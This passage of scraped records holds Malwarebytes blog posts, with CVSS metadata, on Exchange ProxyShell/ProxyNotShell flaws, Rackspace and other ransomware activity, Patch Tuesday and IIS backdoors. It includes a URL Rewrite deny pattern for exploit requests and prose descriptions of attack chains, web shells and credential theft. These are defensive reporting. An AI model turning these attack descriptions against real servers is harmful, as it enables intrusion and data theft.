the following URL Rewrite instructions, which are currently being discussed publicly, are successful in breaking current attack chains:\n\n 1. Open the IIS Manager.\n 2. Expand the Default Web Site.\n 3. Select Autodiscover.\n 4. In the Feature View, click URL Rewrite.\n 5. In the Actions pane on the right-hand side, click Add Rules. \n 6. Select Request Blocking and click OK.\n 7. Add String `.*autodiscover\\.json.*\\@.*Powershell.*` and click OK.\n 8. Expand the rule and select the rule with the Pattern `.*autodiscover\\.json.*\\@.*Powershell.*` and click Edit under Conditions.\n 9. Change the condition input from {URL} to {REQUEST_URI}\n\nThe instructions above can be found on the [Microsoft blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>), with screenshots. It adds that there is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.\n\nAnother option is to block the ports that are used for Remote PowerShell--**HTTP: 5985** and **HTTPS: 5986**.\n\n## The vulnerabilities\n\nThe vulnerabilities were discovered by [GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) while performing security monitoring and incident response services. It was able to assess that the attacks were based on exploit requests with the same format as ProxyShell. But the servers being attacked had all the latest updates, including those that stop ProxyShell.\n\nThe attacks were used to drop web shells on the Exchange servers--a script that can be used by an attacker to run remote commands and maintain persistent access on an already compromised computer.\n\nAccording to security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1575580072961982464>) a significant number of Exchange servers has been backdoored. But he adds that this is not unusual, since the patching process is apparently such a mess that people end up on old Content Updates and don't patch ProxyShell properly.\n\nOn his blog on the subject he points out that if you don't run Microsoft Exchange on premise, and don't have Outlook Web App (OWA) facing the internet, you are not impacted either. In addition, Microsoft also notes that attackers need authenticated access to the vulnerable Exchange Server in order to exploit either of the two vulnerabilities associated with these attacks.\n\nThe vulnerabilities, which are chained together, are:\n\n[CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>), a Server-Side Request Forgery (SSRF) vulnerability. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to other services within an organization's infrastructure.\n\n[CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), a vulnerability that allows remote code execution (RCE) when PowerShell is accessible to the attacker.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T13:00:00", "type": "malwarebytes", "title": "[updated]Two new Exchange Server zero-days in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T13:00:00", "id": "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "href": "https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T16:24:17", "description": "It's not been a great week for cloud computing service provider Rackspace.\n\nOn December 2, customers began experiencing problems connecting and logging into their Exchange environments. Rackspace started [investigating](<https://status.apps.rackspace.com/index/viewincidents?group=2>) and discovered an issue that affected its Hosted Exchange environments. \n\nNow Rackspace has announced it was actually a ransomware incident that caused the service disruptions.\n\nWhile the investigation is ongoing, there are no details known about which ransomware is at play or how the threat actor gained initial access. In a [press release](<https://www.rackspace.com/newsroom/rackspace-technology-hosted-exchange-environment-update>) Rackspace said that the incident was isolated to its Hosted Exchange business. Rackspace has not showed up on any of the known leak sites that ransomware groups use to apply extra pressure on their victims, but this could also be due to the fact that there are ongoing negotiations.\n\n## Hosted Exchange\n\nRackspace's Hosted Exchange customers are mostly small to medium size businesses that don't have the need or staff to run a dedicated on-premise Exchange server. The outage still affects all services in its Hosted Exchange environment, including MAPI/RPC, POP, IMAP, SMTP, and ActiveSync, as well as the Outlook Web Access (OWA) interface that provides access to online email management.\n\n## Workaround\n\nRackspace said it will help affected customers implement a temporary forwarding while the disruption is ongoing:\n\n> "As a temporary solution while you set up Microsoft 365, it is possible to also implement a forwarding option that will allow mail destined for a Hosted Exchange user to be routed to an external email address. Please log in to your customer account for a ticket with instructions to request this option. Customers should reply to the ticket to request the forwarding rule be put into place for each of their users."\n\n## Impact\n\nIn an [8-K SEC filing](<https://www.sec.gov/ix?doc=/Archives/edgar/data/0001810019/000119312522298940/d388117d8k.htm>) Rackspace states that it expects a loss of revenue due to the ransomware attack's impact on its $30 million Hosted Exchange business. An 8-K form is required to report any events concerning a company that could be of importance to the shareholders of that company or the Securities and Exchange Commission (SEC).\n\n## The attack vector\n\nOne possible attack vector was [pointed out by security researcher Kevin Beaumont](<https://doublepulsar.com/rackspace-cloud-office-suffers-security-breach-958e6c755d7f>). It might be due to exploitation of the Microsoft Exchange vulnerabilities tracked as [CVE-2022-41040 and CVE-2022-41082](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>), known as ProxyNotShell.\n\nBeaumont found a Rackspace Exchange server cluster--currently offline--was running a build number from August 2022 a few days prior to the incident disclosure. Since the ProxyNotShell vulnerabilities were only fixed in November, it's possible that threat actors exploited the flaws to breach Rackspace servers.\n\nOne important conclusion Beaumont notes in his post is:\n\n> "For a [managed service provider (MSP)](<https://www.malwarebytes.com/partners/managed-service-providers>) running a shared cluster, such as Hosted Exchange, it means that one compromised account of one customer will compromise the entire hosted cluster."\n\nThis is what may have happened at Rackspace. Don't let it happen to you.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<\u201chttps://www.malwarebytes.com/for-home\u201d>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-08T12:00:00", "type": "malwarebytes", "title": "Rackspace confirms it suffered a ransomware attack", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-08T12:00:00", "id": "MALWAREBYTES:B0C4B025BF22D777A196390CAE7FC07F", "href": "https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T00:05:49", "description": "Microsoft fixed 84 vulnerabilities in its October 2022 Patch Tuesday updates. Thirteen of them received the classification 'Critical'. Among them are a zero-day vulnerability that's being actively exploited, and another that hasn't been spotted in the wild yet.\n\nThe bad news is that the much-desired fix for the \"ProxyNotShell\" [Exchange vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>) was not included.\n\n## What was fixed\n\nA widely accepted [definition for a zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) is a computer-software vulnerability previously unknown to those who should be interested in its mitigation, such as the software vendor. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, computers or a network.\n\nAs such, a publicly known vulnerability is called a zero-day even if there is no known actively used exploitation for it.\n\nThe actively exploited vulnerability in this month's batch is [CVE-2022-41033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41033>), a vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 7.8 out of 10. This is described as a 'Windows COM+ Event System Service Elevation of Privileges (EoP)' vulnerability, which gives an attacker the potential to obtain SYSTEM privileges after successful exploitation.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold on a system. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nAnother publicly disclosed vulnerability that gets a fix is [CVE-2022-41043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41043>), a Microsoft Office Information Disclosure vulnerability. Affected products are Microsoft Office LTSC for Mac 2021 and Microsoft Office 2019 for Mac. Microsoft says attackers could use this vulnerability to gain access to users' authentication tokens.\n\n## What wasn't fixed\n\nThe Exchange Server \"ProxyNotShell\" vulnerabilities, [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>) and [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), were not fixed in this round of updates. One is a Server-Side Request Forgery (SSRF) vulnerability and the other a remote code execution (RCE) vulnerability that exists when PowerShell is accessible to the attacker. The two can be chained together into an attack.\n\nMicrosoft says it will release updates for these vulnerabilities when they are ready. In the meantime, you should read [this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to learn about mitigations for those vulnerabilities.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones:\n\n * Adobe released [security updates](<Adobe%20also%20released%20security%20updates%20to%20fix%2029%20vulnerabilities>) to fix 29 vulnerabilities in several products.\n * Apple published [iOS 16.0.3](<https://support.apple.com/en-us/HT213480>).\n * Fortinet released important [security updates](<https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/>).\n * Google patched several vulnerabilities for [Android](<https://www.malwarebytes.com/blog/news/2022/10/vulnerabilities-in-google-android-could-allow-for-arbitrary-code-execution>).\n * Samsung has started rolling out October 2022 [security updates](<https://androidstories.com/2022/10/12/samsung-2022-security-update-rolling-out-for-these-galaxy-phones/>) for some of its devices.\n * SAP has released [updates](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) for several of its products.\n * VMware published security advisory [VMSA-2022-0025](<https://www.vmware.com/security/advisories/VMSA-2022-0025.html>).\n * Xiaomi released the October 2022 [Security Patch Update tracker](<https://xiaomiui.net/xiaomi-october-2022-security-patch-update-tracker-36308/>).\n\nThat should be enough to keep you busy, et patching!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T17:45:00", "type": "malwarebytes", "title": "Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T17:45:00", "id": "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "href": "https://www.malwarebytes.com/blog/news/2022/10/update-now-october-patch-tuesday-fixes-actively-used-zero-day", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-03T00:13:33", "description": "_Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their dark web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom._\n\nLockbit has rebounded from its unusual fall from grace in November, snatching the title of the month's worst ransomware, [back from Royal](<https://www.malwarebytes.com/blog/threat-intelligence/2023/01/ransomware-in-november-2022>). Royal has meanwhile still shown itself as a force to be reckoned with, ranking third in number of attacks for December. \n\n Known ransomware attacks by gang in December 2022\n\nAttacks by Royal may be down 35 percent from their high of 49 in November, but at the same time, there's good reason to suspect that their attacks are becoming more targeted. \n\nOn December 07, 2022, the Health Sector Cybersecurity Coordination Center (HC3)--an arm of the US Department of Health and Human Services (HHS)--[released a threat brief ](<https://www.hhs.gov/sites/default/files/royal-ransomware-analyst-note.pdf>)about Royal after observing the group disproportionately targeting the healthcare industry. Their crowning attack for December came late in the month when they breached [telecommunications company Intrado](<https://www.bleepingcomputer.com/news/security/royal-ransomware-claims-attack-on-intrado-telecom-provider/>).\n\n Known ransomware attacks by industry sector in December 2022  Known ransomware attacks by country in December 2022\n\nIn terms of progress, the two newcomers that we introduced last month, Play and Project Relic, have vastly different stories to tell. \n\nProject Relic has fallen off the map while Play has turned up the jets--we recorded a whopping 136 percent increase in attacks from the gang compared to November. Since our last update Play has been seen leveraging a never-before-seen exploit chain, which might be responsible for their sharp uptick in attacks. The new Microsoft Exchange attack, dubbed ['OWASSRF'](<https://duo.com/decipher/play-ransomware-group-using-new-proxynotshell-exploit>), chains exploits for [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/cve-2022-41082>) and [CVE-2022-41080](<https://nvd.nist.gov/vuln/detail/CVE-2022-41080>) to gain initial access to corporate networks. This was the technique behind a ransomware attack on [cloud computing service provider Rackspace](<https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack>) in early December, which Play later claimed responsibility for. \n\nPlay's surge in activity, however, was hardly an anomaly for December. Month-on-month we saw hefty percentage-point increases in attacks across the board.\n\nALPHV (aka BlackCat), for example, is a ransomware gang that has consistently topped the charts in our ransomware reviews; the number of their attacks in December (33), however, is not only a 70 percent increase from November but also the highest it's been all 2022. We also saw 25 percent and 116 percent increases from BianLian and BlackBasta, respectively. These upticks are perhaps to be expected, [given that attackers famously love the holiday](<https://www.malwarebytes.com/blog/news/2022/11/how-to-stay-secure-from-ransomware-attacks-this-labor-day-weekend>) seasons due to the reduction in security staff on deck. Only time will tell if ransomware gangs will sustain their heightened levels of activity into the New Year--or if the increase is indeed simply a gift-wrapped aberration.\n\n## Lockbit\u2026 apologizes?\n\nLockbit in December regained the throne as the biggest ransomware gang by attack volume, reversing a three-month downward trend in number of victims.\n\nThe prolific ransomware group claimed on December 12 to have stolen up to 75GB of confidential data from [California's Department of Finance](<https://www.bleepingcomputer.com/news/security/lockbit-claims-attack-on-californias-department-of-finance/>), or over 246,000 files in more than 114,000 folders. Not even [SickKids](<https://www.bleepingcomputer.com/news/security/ransomware-gang-apologizes-gives-sickkids-hospital-free-decryptor/>) (a hospital for sick children) was spared from LockBit's avarice in December. A ransomware attack using LockBit impacted the hospital's internal and corporate systems, hospital phone lines, and website.\n\nWhile we're not surprised to [see a gang stoop to such lows](<https://www.malwarebytes.com/blog/business/2020/10/healthcare-security-death-by-ransomware>), we don't find many issuing apologies after the fact. Two days later LockBit apologized for the attack, which it blamed on a rogue affiliate, and released a decryptor for free. \n\nLockBit's operation's policy states \"It is forbidden to encrypt institutions where damage to the files could lead to death, such as cardiology centers, neurosurgical departments, maternity hospitals and the like, that is, those institutions where surgical procedures on high-tech equipment using computers may be performed.\"\n\nOf course the apology doesn't turn LockBit in to some kind of Robin Hood. Its business model is to inflict so much harm that people are willing to pay a fortune to make it stop.\n\n## New ransomware gangs\n\n### Unsafe\n\nIn December, we saw a group emerge that makes its cash by riding on the coattails of real ransomware gangs. \n\nThe new player, Unsafe, seems to recycle leaks from other ransomware groups. Unsafe provides security blogs for cybercriminals to post victims and leaked data as well as consultation services for a fee. It currently lists eight victims. \n\n\n\n### Endurance\n\nWe call them ransomware _gangs_ for a reason: These are groups of cybercriminals working together in a hierarchical organization. Rarely do we ever see lone wolf attacks, and if we do it's even more unusual for them to make as big of a splash in so short of a time as Endurance has.\n\nThis cybercriminal, known on dark web forums as IntelBroker, tends to make individual posts about data on sale.\n\nIn less than 30 days since its inception, Endurance appears to have successfully infiltrated some big corporations and breached several US government entities. After posting some high-value victims, Endurance has removed them from its dark web site, which is \"undergoing development\".\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T17:15:00", "type": "malwarebytes", "title": "Ransomware in December 2022", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-02-01T17:15:00", "id": "MALWAREBYTES:44E8550360FE68D55DE72F8F97C79C77", "href": "https://www.malwarebytes.com/blog/threat-intelligence/2023/02/ransomware-in-december-2022", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker 